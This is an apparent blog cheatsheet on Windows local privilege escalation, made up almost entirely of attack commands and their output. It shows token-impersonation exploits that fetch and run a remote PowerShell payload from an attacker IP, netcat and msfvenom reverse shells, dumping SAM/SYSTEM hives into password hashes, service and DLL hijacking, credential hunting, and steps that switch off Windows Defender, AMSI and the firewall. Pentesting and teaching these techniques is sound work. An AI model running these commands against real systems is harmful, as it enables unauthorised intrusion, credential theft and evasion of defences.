17 minutes
windows local privilege escalation
this is my windows privilege escalation cheatsheet, gonna keep this growing and updated over time
basic enumeration
PS C:\> whoami
PS C:\> whoami /priv # exploitable privileges?
PS C:\> whoami /groups # administrator?
PS C:\> hostname
PS C:\> ipconfig /all ; route print ; arp -a # network information
PS C:\> netstat -anto | Select-String "listening" # check for services on loopback
PS C:\> netstat -anto | Select-String "established" # check outgoing connections
PS C:\> netsh advfirewall show allprofiles # firewall settings
PS C:\> Get-ChildItem 'Env:' | ft Key,Value # show environment variables
PS C:\> net user # get local users
PS C:\> net user /domain # get domain users
PS C:\> ls -force /Users/ # see home folders
PS C:\> ls -force / # check for interesting files or directories
PS C:\> tree /f /a \Users # check for interesting files
PS C:\> cat (get-psreadline).historysavepath # read powershell history
PS C:\> Get-Process # check running processes
PS C:\> tasklist /svc # check running processes
PS C:\> tasklist /v /fi "username eq system" # SYSTEM processes
PS C:\> Get-Service # check services
PS C:\> Get-PSDrive # check attached drives
whoami /all
PS C:\> whoami /all # see username, groups and privileges
USER INFORMATION
----------------
User Name SID
==================== ============================================
client\administrator S-1-5-21-524867371-2016665888-3240400722-500
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
============================================= ================ ============================================ ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators Alias S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
CLIENT\Group Policy Creator Owners Group S-1-5-21-524867371-2016665888-3240400722-520 Mandatory group, Enabled by default, Enabled group
CLIENT\Domain Admins Group S-1-5-21-524867371-2016665888-3240400722-512 Mandatory group, Enabled by default, Enabled group
CLIENT\Schema Admins Group S-1-5-21-524867371-2016665888-3240400722-518 Mandatory group, Enabled by default, Enabled group
CLIENT\Enterprise Admins Group S-1-5-21-524867371-2016665888-3240400722-519 Mandatory group, Enabled by default, Enabled group
CLIENT\Denied RODC Password Replication Group Alias S-1-5-21-524867371-2016665888-3240400722-572 Mandatory group, Enabled by default, Enabled group, Local Group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
========================================= ================================================================== =======
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled
SeMachineAccountPrivilege Add workstations to domain Enabled
SeSecurityPrivilege Manage auditing and security log Enabled
SeTakeOwnershipPrivilege Take ownership of files or other objects Enabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeSystemProfilePrivilege Profile system performance Enabled
SeSystemtimePrivilege Change the system time Enabled
SeProfileSingleProcessPrivilege Profile single process Enabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Enabled
SeCreatePagefilePrivilege Create a pagefile Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeDebugPrivilege Debug programs Enabled
SeSystemEnvironmentPrivilege Modify firmware environment values Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled
SeUndockPrivilege Remove computer from docking station Enabled
SeEnableDelegationPrivilege Enable computer and user accounts to be trusted for delegation Enabled
SeManageVolumePrivilege Perform volume maintenance tasks Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
SeCreateSymbolicLinkPrivilege Create symbolic links Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled
the interesting bits to watch out for are:
Mandatory Label\High Mandatory Levelthis means the current process is running with elevated privilegesBUILTIN\Administratorsif we are in local administrator groupCLIENT\Domain Adminsif our user is domain administrator
systeminfo
PS C:\> systeminfo
Host Name: DC04
OS Name: Microsoft Windows Server 2016 Standard
OS Version: 10.0.14393 N/A Build 14393
OS Manufacturer: Microsoft Corporation
OS Configuration: Primary Domain Controller
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00376-30821-30176-AA955
Original Install Date: 4/16/2018, 12:09:40 AM
System Boot Time: 4/14/2021, 10:16:19 PM
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
[01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC-05:00) Eastern Time (US & Canada)
Total Physical Memory: 4,095 MB
Available Physical Memory: 2,647 MB
Virtual Memory: Max Size: 4,799 MB
Virtual Memory: Available: 3,445 MB
Virtual Memory: In Use: 1,354 MB
Page File Location(s): C:\pagefile.sys
Domain: CLIENT.DOMAIN.COM
Logon Server: N/A
Hotfix(s): 4 Hotfix(s) Installed.
[01]: KB3199986
[02]: KB4049065
[03]: KB4520724
[04]: KB4571694
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) 82574L Gigabit Network Connection
Connection Name: Ethernet0
DHCP Enabled: No
IP address(es)
[01]: 172.16.4.5
[02]: fe80::8975:cd87:5c81:1f7f
Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.
interesting things here:
-
OS Name: Microsoft Windows Server 2016 StandardandOS Version: 10.0.14393 N/A Build 14393can be useful when searching for potential exploits -
hotfixes
01: KB3199986
02: KB4049065
03: KB4520724
04: KB4571694
hotfixes can be enumerated by checking microsoft securty bulletin (for example, windows-exploit-suggester tool can do this by ingesting systeminfo output)
System Type: x64-based PCis important information, since we might have to compile binaries for the system to run an exploit or upload tools like netcat, mimikatz and so on. those will need to match the architecture of the target.
common methods
user in local administrator group (UAC bypass)
see if your user is part of an administrative group
PS C:\> whoami /groups # in administrators group
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
============================================= ================ ============================================ ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
user in local admin group -----------> BUILTIN\Administrators Alias S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
but medium integrity process -----------> Mandatory Label\Medium Mandatory Level Label S-1-16-12288
check UAC (user account control):
# check if enabled
PS C:\> Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System | Select-Object EnableLUA
EnableLUA
---------
1
# check behavior
PS C:\> Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System | Select-Object ConsentPromptBehaviorAdmin
ConsentPromptBehaviorAdmin
--------------------------
5
# 0 -> no prompt
# 1 -> admin asked for password
# 2 -> UAC will always ask for confirmation to admin (on secure desktop)
# 3 -> like 1
# 4 -> like 2
# 5 (default) -> will ask admin to confirm running non-windows binaries with high privileges
in such a situation it might be possible to bypass UAC, there are various exploits you can use depending on the exact windows version, but eventvwr and fodhelper are known well.
note that most UAC bypass exploits utilize DLL hijacking.
privileges
PS C:\> whoami /priv
PS C:\> whoami /groups # local admin?
see also microsoft docs about privileges and this amazing slide from andrea pierini
there are a lot of ways to abuse privileges, but the most common ones are:
- SeImpersonatePrivilege // SeAssignPrimaryTokenPrivilege // SeCreateTokenPrivilege
- SeBackupPrivilege // SeRestorePrivilege
- SeLoadDriverPrivilege
- SeTakeOwnershipPrivilege
SeImpersonatePrivilege // SeAssignPrimaryTokenPrivilege // SeCreateTokenPrivilege
if you have a service account with SeImpersonatePrivilege enabled, you are system.
juicy potato
take a look at the original rotten potato paper
you can use juicy potato exploit to spawn a process as nt authority\system by token impersonation:
PS C:\> ./JuicyPotato.exe -t * -p C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -a "iex(iwr -uri 10.0.13.37/payload.ps1 -usebasicparsing)" -l 1337
printspoofer
works also on windows server 2019 with SeImpersonatePrivilege (while JuicyPotato does not)
PS C:\> ./PrintSpoofer64.exe -c "powershell iex(iwr -uri 10.0.13.37/payload.ps1 -usebasicparsing)"
SeBackupPrivilege // SeRestorePrivilege
gives you unfettered read/write access to the filesystem. this way we can read important files like the SAM, SECURITY and SYSTEM hives to extract user hashes.
PS C:\Windows\Temp> reg save HKLM\SAM SAM
PS C:\Windows\Temp> reg save HKLM\SYSTEM SYSTEM
PS C:\Windows\Temp> reg save HKLM\SECURITY SECURITY
and then transfer the saved hives on your machine to dump hashes:
$ secretsdump.py -sam SAM -system SYSTEM -security SECURITY LOCAL
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[*] Target system bootKey: 0x8d1b3bcb293ec2bacf262ca05e9827c9
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:19a3322455162a546ea115764e41817e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:7025790b5bb6b1c87aff52f9fd307ce1:::
joe:1001:aad3b435b51404eeaad3b435b51404ee:45281a1a414c1b153240f4de7f92f1gd:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] DPAPI_SYSTEM
dpapi_machinekey:0x74fc756809afe15e43878238324saf2a395e13d5
dpapi_userkey:0x3fc57e5af5f687620a96e594694dca9c1dd382d3
0000 0C EF 72 8A 43 7E B4 55 55 BE ED 92 C6 D9 01 11 ..r.C~.UU.......
0010 DA 01 E1 C2 E3 83 93 D6 A9 B3 75 42 64 F6 43 86 ..........uBd.C.
0020 4B 57 29 42 05 FF 94 D7 9E A9 44 9A DE 97 89 FB KW)B......D.....
0030 9E 0E A6 86 DB C9 2E 44 6E A7 08 29 D4 F4 FD 66 .......Dn..)...f
[*]NL$KM:0cef728a434eb45555beed92c6d90111da01e1c2e38393d619b3754264f643864b57294205ff94d79ea9449ade9789fb9e0ea686dbc92e446ea70829d4f4f266
[*] Cleaning up...
SeLoadDriverPrivilege
also see Abusing SeLoadDriverPrivilege. you can load a vulnerable driver and exploit it to get code running in SYSTEM context
PS C:\> sc.exe create Capcom type="kernel" binPath="C:\Users\user\Desktop\Capcom.sys"
PS C:\> sc.exe start Capcom
SeTakeOwnershipPrivilege
allows you to take ownership of any object
PS C:\> takeown /f "C:\Program Files"
PS C:\> icacls.exe "C:\Program Files" /grant "$env:USER":F
and then you can modify the file as necessary to install malicious service.
credentials
search for clear text credentials
check these files for exposed credentials:
C:\unattend.xml
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattend\Unattend.xml
C:\sysprep\sysprep.xml
C:\Windows\system32\sysprep.inf
C:\Windows\system32\sysprep\sysprep.xml
C:\inetpub\wwwroot\web.config
they can be in different paths, so it might make sense to also search for them:
PS C:\> cmd /c dir /s /b sysprep.xml # search for sysprep.xml
also search file contents for ‘password’ or some other string:
PS C:\Users> findstr /spin "password" *.* # search all files with extensions
PS C:\Users> findstr /spin "secret" *.*
PS C:\Users> findstr /spin "password" *.txt *.ini *.config *.xml # search specific extensions
you should search inside Users or Program Files directory to reduce the amount of false positives
search the registry for passwords as well (can be a lot of entries here):
PS C:\> reg query HKLM /f password /t REG_SZ /s
PS C:\> reg query HKCU /f password /t REG_SZ /s
dpapi saved credentials
# credentials
PS C:\> ls -force $env:LOCALAPPDATA/Microsoft/Credentials/
PS C:\> ls -force $env:APPDATA/Microsoft/Credentials/
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a-hs- 4/29/2018 1:26 AM 422 45C236B9B8A454F3E4D0538A6F6C5842
-a-hs- 5/13/2018 4:28 PM 494 EBBFB3FE75D4A2D06163ED0DA58805FB
# masterkeys (also check LOCALAPPDATA)
PS C:\> ls -force $env:APPDATA/Microsoft/Protect/
Mode LastWriteTime Length Name
---- ------------- ------ ----
d---s- 9/18/2020 11:33 AM S-1-5-21-2291914956-3290296217-2402366952-1122
-a-hs- 4/24/2018 12:03 AM 24 CREDHIST
-a-hs- 9/18/2020 6:03 PM 76 SYNCHIST
PS C:\> ls -force $env:APPDATA/Microsoft/Protect/S-1-5-21-2291914956-3290296217-2402366952-1122
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a-hs- 9/18/2020 11:33 AM 740 3b7bc2e9-40f9-408d-82cd-b09e535fdce0
-a-hs- 6/4/2020 4:43 PM 740 4c2003e9-effc-4f96-a468-9b66acfa87a3
-a-hs- 4/24/2018 12:03 AM 900 BK-CORP
-a-hs- 6/4/2020 4:43 PM 740 d21c87da-fc2a-4d38-b14f-a8e47da3b7a9
-a-hs- 6/4/2020 4:43 PM 740 d9091ed6-ca04-4693-8fe3-77f0143318ea
-a-hs- 9/18/2020 11:33 AM 24 Preferred
if you know the user password, you can decrypt the masterkeys using mimikatz (dpapi) and unlock the saved user credentials
recycle bin
# recycle bin is accessible over shell namespace 10
PS C:\> $shell = New-Object -com shell.application
PS C:\> $rbin = $shell.Namespace(10)
PS C:\> $items = $rbin.Items()
PS C:\> $items | select -first 2
PS C:\> $items[0] # or [1], [2], etc.
runas
if you already know the administrator password, you could just spawn a process
PS C:\> runas /env /noprofile /user:Administrator Password1 "C:\Windows\System32\cmd.exe"
pscredential
you can create a pscredential if you know a user’s password
PS C:\> $SecPasswd = ConvertTo-SecureString "Password1" -AsPlainText -Force
PS C:\> $Cred = New-Object System.Management.Automation.PSCredential("Administrator", $SecPasswd)
PS C:\> $Computer = "DC01"
PS C:\> [System.Diagnostics.Process]::Start("C:\temp\nc.exe 10.0.13.37 1337 -e cmd", $Cred.Username, $Cred.Password, $Computer)
misconfigurations
insecure permissions
look for files and programs with insecure permissions using accesschk.exe from Windows Sysinternals
# show effective access of current user
# -u suppress errors
# -s recurse
# -w show only writable
PS C:\> ./accesschk.exe -accepteula -wsu C:\*.*
# weak directory permissions, writable dirs
PS C:\> ./accesschk.exe -accepteula -wsud "Everyone" C:\*.*
PS C:\> ./accesschk.exe -accepteula -wsud "Users" C:\*.*
PS C:\> ./accesschk.exe -accepteula -wsud "Authenticated Users" C:\*.*
# -c check services permissions (use * for all)
PS C:\> ./accesschk.exe -accepteula -wsuc * # current user
PS C:\> ./accesschk.exe -accepteula -wsuc "Everyone" *
PS C:\> ./accesschk.exe -accepteula -wsuc "Authenticated Users" *
these can then be overwritten with malicious executables or dll. malicious code is executed when the service is restarted (reboot can also work).
also check for file permissions using icacls:
PS C:\> icacls "C:\Program Files\*" | findstr "(F) (M) :\" | findstr ":\ everyone authenticated users todos %username%"
PS C:\> icacls "C:\Program Files (x86)\*" | findstr "(F) (M) :\" | findstr ":\ everyone authenticated users todos %username%"
PS C:\Program Files\> icacls.exe * | findstr "(F)" # full access
PS C:\Program Files\> icacls.exe * | findstr "(M)" # modify access
always install elevated
check if AlwaysInstallElevated is set to 1:
PS C:\> Get-ItemProperty HKLM\Software\Policies\Microsoft\Windows\Installer
PS C:\> Get-ItemProperty HKCU\Software\Policies\Microsoft\Windows\Installer
if this value is set, you can create an msi package and install it with elevated privileges
$ msfvenom -p windows/adduser USER=hacker PASS=evil -f msi -o evil.msi
$ msfvenom -p windows/adduser USER=hacker PASS=evil -f msi-nouac -o evil.msi
PS C:\> msiexec /quiet /qn /i C:\Windows\Temp\evil.msi
service manipulation
you can look for:
- modifiable service
- writable service executable
- unquoted service path
- hijackable dll
in most cases if any of those are present, you can get code execution as that service’s user (usually SYSTEM). as you can imagine, this goes hand in hand with insecure permissions :)
# show services
PS C:\> Get-Service
# get list of all service names
PS C:\> sc.exe query | select-string service_name
# check the configuration of a specific service
PS C:\> sc.exe qc <ServiceName>
# check permissions for specific service
PS C:\> sc.exe sdshow <ServiceName>
# get executable path for all processes
PS C:\> wmic process list full | select-string 'executablepath=C:'
PS C:\> wmic process list full | select-string 'executablepath=C:' | select-string -notmatch 'system32|syswow'
once you found a vulnerable service, you could escalate by changing for example the binPath attribute:
create a malicious service executable:
$ msfvenom -p windows/shell_reverse_tcp LHOST=10.0.13.37 LPORT=1337 -f exe-service -o shell_svc.exe
# CVE-2019-1322 UsoSvc - Windows 10
PS C:\Windows\system32> sc.exe stop UsoSvc
PS C:\Windows\system32> sc.exe config UsoSvc binPath="C:\Windows\System32\spool\drivers\color\shell_svc.exe"
PS C:\Windows\system32> sc.exe qc UsoSvc
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: usosvc
TYPE : 20 WIN32_SHARE_PROCESS
START_TYPE : 2 AUTO_START (DELAYED)
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Windows\System32\spool\drivers\color\shell_svc.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Update Orchestrator Service
DEPENDENCIES : rpcss
SERVICE_START_NAME : LocalSystem
PS C:\Windows\system32> sc.exe start UsoSvc
# upnphost on Windows XP
C:\> sc.exe config upnphost binpath= "C:\Windows\System32\spool\drivers\color\shell_svc.exe"
C:\> sc.exe config upnphost obj= ".\LocalSystem" password= ""
C:\> sc.exe qc upnphost
C:\> sc.exe config upnphost depend= ""
C:\> sc.exe start upnphost
unquoted paths
if the path to an executable doesn’t have quotes around it, windows will try to execute every ending before a space.
for example, if the path is C:\Program Files (x86)\IObit\IObit Uninstaller\IUService.exe (i’m referring to this exploit)
then windows will try executing:
C:\Program.exe
C:\Program Files.exe
C:\Program Files (x86)\IObit\IObit.exe
C:\Program Files (x86)\IObit\IObit Uninstaller\IUService.exe
we can take advantage of this behavior if we have write privileges to C:\Program Files (x86)\IObit\
# check for unquoted paths in services
PS C:\> wmic service get name,pathname | select-string -notmatch '"|^$'
PS C:\> wmic service get name,displayname,pathname,startmode | select-string -notmatch 'C:\\Windows|"|^$'
# check only non-windows services
PS C:\> wmic service get name,displayname,pathname,startmode | select-string -notmatch 'C:\\Windows|"|^$'
# check only auto started services
PS C:\> wmic service get name,displayname,pathname,startmode | select-string "auto" | select-string -notmatch 'C:\\Windows|"|^$'
if any of the paths don’t have quote around them and have spaces in it, check if you can write to the unquoted path (icacls)
dll hijacking
when a windows process wants to load a dll file, it goes through the following to search for it:
- directory where process was launched
C:\Windows\System32C:\Windows\SystemC:\Windows\- current working directory
- directories in order from system
PATH - directories in order from user
PATH
so if you can do any of:
- writing in a system folder
- writing to a non-default program install directory (f.e.,
C:\Python27) - restart a service running as SYSTEM (a missing dll can be identified using procmon)
then you can get SYSTEM privileges by loading a malicious dll.
to check for privileges use icacls
create malicious dll:
$ msfvenom -p windows/reverse_shell_tcp LHOST=10.0.13.37 LPORT=1337 -f dll -o malicious.dll
scheduled tasks
check scheduled tasks for anything interesting
PS C:\> schtasks /query /fo LIST
PS C:\> Get-ScheduledTask
startup
check startup programs for anything out of the ordinary
PS C:\> wmic startup
PS C:\> wmic startup get caption,command
PS C:\> Get-ChildItem "C:\Users\*\Start Menu\Programs\Startup" # check all users startup dirs
exploits
vulnerable software
get a list of installed software on the machine:
PS C:\> get-package | select-object name,version # will list installed software and versions
PS C:\> Get-ChildItem HKLM:\SOFTWARE | ft Name # check the registry too
PS C:\> ls -force -Path 'C:\Program Files*\*' | ft Parent,Name,LastWriteTime # also the program directories
the list can then be cross-checked against exploit-db, and look for local privilege escalation vulnerabilities like unquoted paths or insecure permissions.
vulnerable drivers
check if any vulnerable drivers are installed. since they run in SYSTEM context, they can be a good target for exploitation.
PS C:\> driveryquery # get a list of installed drivers
PS C:\> driverquery /v /fo csv | ConvertFrom-CSV | Select-Object 'Module Name' | fl
PS C:\> driverquery /v /fo csv | ConvertFrom-CSV | Select-Object 'Module Name', 'Display Name', 'Start Mode', 'Path' | fL
PS C:\> DriverQuery.exe --no-msft # OffensiveCSharp DriverQuery
[+] Enumerating driver services...
[+] Checking file signatures...
Intel(R) Serial IO GPIO Controller Driver
Service Name: iaLPSSi_GPIO
Path: C:\Windows\System32\drivers\iaLPSSi_GPIO.sys
Version: 1.1.250.0
Creation Time (UTC): 7/16/2016 1:18:02 PM
Cert Issuer: CN=Intel External Basic Issuing CA 3B, O=Intel Corporation, L=Santa Clara, S=CA, C=US
Signer: CN=Intel Corporation - Client Components Group, O=Intel Corporation, L=Santa Clara, S=CA, C=US
PS C:\> DriverQuery.exe --no-msft | select-string 'name|version|^$' # get name/version list
Service Name: iaLPSSi_GPIO
Version: 1.1.250.0
Service Name: pvscsi
Version: 1.3.15.0
Service Name: vm3dmp
Version: 8.16.01.0024
Service Name: vm3dmp-debug
Version: 8.16.01.0024
Service Name: vm3dmp-stats
Version: 8.16.01.0024
Service Name: vm3dmp_loader
Version: 8.16.01.0024
Service Name: vmci
Version: 9.8.16.0
Service Name: VMMemCtl
Version: 7.4.2.0
Service Name: vmmouse
Version: 12.5.7.0
Service Name: vmusbmouse
Version: 12.5.4.0
Service Name: vsock
Version: 9.8.16.0
windows kernel exploits
PS C:\> systeminfo | Select-String "os name|os version|system type"
OS Name: Microsoft Windows Server 2016 Standard
OS Version: 10.0.14393 N/A Build 14393
System Type: x64-based PC
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
PS C:\> wmic qfe get HotFixID
HotFixID
KB3199986
KB4049065
KB4520724
KB4571694
then use searchsploit, or search online for an exploit based on these. for example search from this could be:
windows server 2016 "10.0.14393" exploit
KB4571694 site:microsoft.com
also check the following resources:
antivirus and other mitigations
windows defender
# see if windows defender is running
PS C:\> Get-Service windefend
Status Name DisplayName
------ ---- -----------
Running windefend Windows Defender Service
# check status
PS C:\> Get-MpComputerStatus | findstr /i "disabled enabled"
AMServiceEnabled : True
AntispywareEnabled : True
AntivirusEnabled : True
BehaviorMonitorEnabled : True
IoavProtectionEnabled : True
NISEnabled : True
OnAccessProtectionEnabled : True
RealTimeProtectionEnabled : True
# check preferences
PS C:\> Get-MpPreference | findstr /i "disable enable scan" | findstr /i "true false"
CheckForSignaturesBeforeRunningScan : False
DisableArchiveScanning : False
DisableAutoExclusions : False
DisableBehaviorMonitoring : False
DisableBlockAtFirstSeen : False
DisableCatchupFullScan : True
DisableCatchupQuickScan : True
DisableDatagramProcessing : False
DisableEmailScanning : True
DisableIOAVProtection : False
DisablePrivacyMode : False
DisableRealtimeMonitoring : False
DisableRemovableDriveScanning : True
DisableRestorePoint : True
DisableScanningMappedNetworkDrivesForFullScan : True
DisableScanningNetworkFiles : False
DisableScriptScanning : False
EnableFileHashComputation : False
EnableLowCpuPriority : False
ScanOnlyIfIdleEnabled : True
SignatureDisableUpdateOnStartupWithoutEngine : False
# disable AMSI (can get access denied)
PS C:\> Set-MpPreference -DisableScriptScanning $true
PS C:\> Get-MpPreference | findstr /i "scanning"
DisableArchiveScanning : False
DisableEmailScanning : True
DisableRemovableDriveScanning : True
DisableScanningMappedNetworkDrivesForFullScan : True
DisableScanningNetworkFiles : False
DisableScriptScanning : True
# disable realtime monitoring (can get access denied)
PS C:\> Set-MpPreference -DisableRealtimeMonitoring $true # change to $false to re-enable
PS C:\> Get-MpComputerStatus | findstr /i "disabled enabled"
AMServiceEnabled : True
AntispywareEnabled : True
AntivirusEnabled : True
BehaviorMonitorEnabled : False
IoavProtectionEnabled : False
NISEnabled : False
OnAccessProtectionEnabled : False
RealTimeProtectionEnabled : False
# add excluded path
PS C:\> Add-MpPreference -ExclusionPath "C:\Users\joe"
firewall
# check if firewall is enabled
PS C:\> netsh advfirewall show allprofiles | Select-String "profile|state|policy"
Domain Profile Settings:
State ON
Firewall Policy BlockInbound,AllowOutbound
Private Profile Settings:
State ON
Firewall Policy BlockInbound,AllowOutbound
Public Profile Settings:
State ON
Firewall Policy BlockInbound,AllowOutbound
# disable it (might get access denied)
PS C:\> netsh advfirewall set allprofiles state off
PS C:\> netsh advfirewall show allprofiles | Select-String "profile|state|policy"
Domain Profile Settings:
State OFF
Firewall Policy BlockInbound,AllowOutbound
Private Profile Settings:
State OFF
Firewall Policy BlockInbound,AllowOutbound
Public Profile Settings:
State OFF
Firewall Policy BlockInbound,AllowOutbound
applocker
# see applocker rules
PS C:\> Get-AppLockerPolicy -Effective
PS C:\> Get-AppLockerPolicy -Effective | Select -ExpandProperty RuleCollections
since everything under C:\Windows\ is allowed by default, with basic settings it can be bypassed trivially by using common writable directories:
C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
C:\Windows\System32\spool\drivers\color
C:\Windows\Tasks
C:\Windows\tracing
C:\Windows\Temp
C:\Users\Public
tools
Windows SysInternals
OffensiveCSharp
LOLBAS
wesng
3487 Words
2021-04-25 09:04